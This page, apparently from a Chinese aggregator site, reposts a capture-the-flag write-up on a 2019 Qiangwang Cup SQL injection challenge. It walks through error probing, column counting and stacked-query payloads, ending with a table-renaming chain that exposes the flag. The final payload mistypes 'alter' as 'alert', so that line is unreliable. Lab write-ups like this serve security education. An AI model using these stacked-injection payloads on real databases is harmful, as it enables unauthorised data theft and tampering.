首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-01-13 09:36:33
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
快遞保價了會全額賠付嗎
快遞保價了會全額賠付嗎
封面新聞記者馬夢飛9月20日,#百萬奢侈品在快遞點浸水損毀#的話題在微博上引起熱議。近日,消費者黃女士投訴稱,自己價值115萬元的奢侈品在申通快遞網點浸水損毀,經過一年多的溝通聯系,此事至今沒有得到解決。申通方面表示,由于黃女士沒有提前保價...
2026-01-13
蘇炳添的第一條抖音
蘇炳添的第一條抖音
蘇炳添為何将自己的抖音賬号注銷呢?昨天蘇炳添入駐抖音的事情大家應該都知道了,而且蘇神也在平台上發布了第一條視頻,蘇炳添稱,今天我正式入駐抖音啦,知道大家非常的關注我,然後還發了一個9和八三的健身操,但是據我所知,蘇炳添并不是第一次入駐抖音,...
2026-01-13
文創産品設計的理解
文創産品設計的理解
産品設計是提高企業競争力、提供可行産品的直接途徑。開發新産品時,企業通常與工業産品設計公司合作,完成新産品的開發,制作産品的手闆模型。那麼縮小版面,産品設計下的産品設計能做些什麼?接下來讓小編給您詳細的介紹一下産品設計做文創産品能做什麼。博...
2026-01-13
大家快來猜謎語
大家快來猜謎語
大家快來猜謎語?【每日詩詞】【蔔算子慢】柳永,今天小編就來說說關于大家快來猜謎語?下面更多詳細答案一起來看看吧!大家快來猜謎語【每日詩詞】【蔔算子慢】柳永江楓漸老汀蕙半凋滿目敗紅衰翠楚客登臨正是暮秋天氣引疏砧、斷續殘陽裡對晚景、傷懷念遠新愁...
2026-01-13
不帶鐵線的綠松石好嗎
不帶鐵線的綠松石好嗎
綠松石是一種結構複雜的磷酸鹽礦物,硬度不高,光澤柔和,結構緻密。它的顔色根據礦物鐵與銅的含量差異可呈現淡藍,藍綠,綠色等,通常分為瓷松,綠松,泡松,鐵線松等,品質差别很大。珠寶市場常見的綠松石是鐵線松與瓷松。既然鐵線在綠松石上是非常易見的,...
2026-01-13
Copyright 2023-2026 - www.tftnews.com All Rights Reserved